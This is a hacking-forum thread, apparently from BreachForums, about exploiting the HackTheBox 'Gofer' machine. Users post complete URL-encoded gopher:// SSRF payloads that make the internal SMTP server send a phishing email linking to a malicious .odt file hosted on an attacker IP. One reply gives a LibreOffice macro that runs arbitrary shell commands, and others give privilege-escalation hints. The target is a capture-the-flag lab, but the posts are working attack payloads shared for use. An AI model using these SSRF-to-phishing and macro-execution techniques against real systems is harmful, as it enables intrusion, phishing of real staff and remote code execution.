Gofer - Thread
by chickensaladsand - Sunday July 30, 2023 at 07:10 AM
#11
(Jul 30, 2023, 07:35 PM)frfrfrfrfrfrf Wrote: try this one : gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>this</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

That's nice. What are you using for the .odt file? I tried exploit/multi/fileformat/libreoffice_macro_exec on msf but didn't work.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: he post combolist in database forum
#12
[quote =“frfrfrfrfrfrf”pid ='81493'日期线='1690745736']
试试这个:gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E% 250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue% 2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word% 20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>这个</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d% 250a
[/引用]

基于这个poc,我不能使用他,你能帮我吗
#13
(Jul 31, 2023, 02:54 AM)chickensaladsand Wrote:
(Jul 30, 2023, 07:35 PM)frfrfrfrfrfrf Wrote: try this one : gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>this</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

That's nice. What are you using for the .odt file? I tried exploit/multi/fileformat/libreoffice_macro_exec on msf but didn't work.

I created mine manually. The macro isn't complicated:

Sub Main
    Shell("<CMD>")
End Sub

You can do this in LibreOffice Writer.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | Contact us via http://breachqr3dqbysbq5khaadg5ynnpxn2wrmw5y3rnzesun55l6lkq73yd.onion/misc.php?action=help&hid=27 if you feel this is incorrect.
#14
Has anyone finished it, can I ask?
#15
thanks for the information friend
#16
May I ask where your macro is placed, this is my command "gopher%253A%252F%252Fgofer.htb%253A25%252FxHELO%2520gopher.htb%250AMail%2520From%253A%2520%253Cbaihu%2540site.com%253E% 250ARCPT%2520To%253A%2520%253Cjdavis%2540gofer.htb%253E%250AData%250ATo%253A%2520jdavis%2540gofer.htb%250AFrom%253A%2520baihu%2540site.com%250ADate%253A %2520Mon%252C%25207%2520Nov% 25202016%252008%253A45%253A16%250ASubject%253A%2520An%2520example%2520email%250A%250A%253Ca%252Bhref%253D%2522http%253A%252F%252F10.10.16. 14%253A8000%252F1.odt%253E%250ASub% 2520Main%250A%2520%2520%2520%2520Shell(%2522ls%2522)%250AEnd%2520Sub%250A%253C%252Fa%253E%250A%250A.%250A%250AQUIT%250d%250a"
#17
(Jul 31, 2023, 01:09 PM)BaiHu Wrote: May I ask where your macro is placed, this is my command "gopher%253A%252F%252Fgofer.htb%253A25%252FxHELO%2520gopher.htb%250AMail%2520From%253A%2520%253Cbaihu%2540site.com%253E% 250ARCPT%2520To%253A%2520%253Cjdavis%2540gofer.htb%253E%250AData%250ATo%253A%2520jdavis%2540gofer.htb%250AFrom%253A%2520baihu%2540site.com%250ADate%253A %2520Mon%252C%25207%2520Nov% 25202016%252008%253A45%253A16%250ASubject%253A%2520An%2520example%2520email%250A%250A%253Ca%252Bhref%253D%2522http%253A%252F%252F10.10.16. 14%253A8000%252F1.odt%253E%250ASub% 2520Main%250A%2520%2520%2520%2520Shell(%2522ls%2522)%250AEnd%2520Sub%250A%253C%252Fa%253E%250A%250A.%250A%250AQUIT%250d%250a"

The macro goes in a malicious odt file

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | Contact us via http://breachqr3dqbysbq5khaadg5ynnpxn2wrmw5y3rnzesun55l6lkq73yd.onion/misc.php?action=help&hid=27 if you feel this is incorrect.
#18
https://breachforums.rs/Thread-HTB-Gofer-witreup
#19
(Jul 31, 2023, 09:36 PM)deathfrom Wrote: I am stuck on the pwn challenge for root. Any suggestions?

Try reversing it. It's not a traditional BOF btw. If you play with the options, you'll be able to overwrite user privs to get admin status. The rest is, essentially, wildcard injection.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | Contact us via http://breachqr3dqbysbq5khaadg5ynnpxn2wrmw5y3rnzesun55l6lkq73yd.onion/misc.php?action=help&hid=27 if you feel this is incorrect.
#20
(Aug 01, 2023, 12:04 AM)breher Wrote: hey guys. Also very stuck at this final pwn challenge. Can someone give a suggestion how to become an admin with this app?
not really a reversing guy

Case 8 is important.. Look what it does, if you don't know what the syntax does, google it. understand what 0x.. means and how to translate it to a normal thing


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 98 4,762 11 hours ago
Last Post: cacha123
  [Season10] ROOT Pterodactyl pulsebreaker 58 2,119 Yesterday, 05:37 PM
Last Post: Evocator
  Powerful-Android-RAT-2026 opsecmaster67 0 75 Yesterday, 05:02 PM
Last Post: opsecmaster67
  Hackers Cave 4 Static Android Blogs opsecmaster67 0 65 Yesterday, 04:44 PM
Last Post: opsecmaster67
  Android-Hacker-DEV Mtigating Security In Android opsecmaster67 0 64 Yesterday, 04:42 PM
Last Post: opsecmaster67

Forum Jump:


 Users browsing this forum: 1 Guest(s)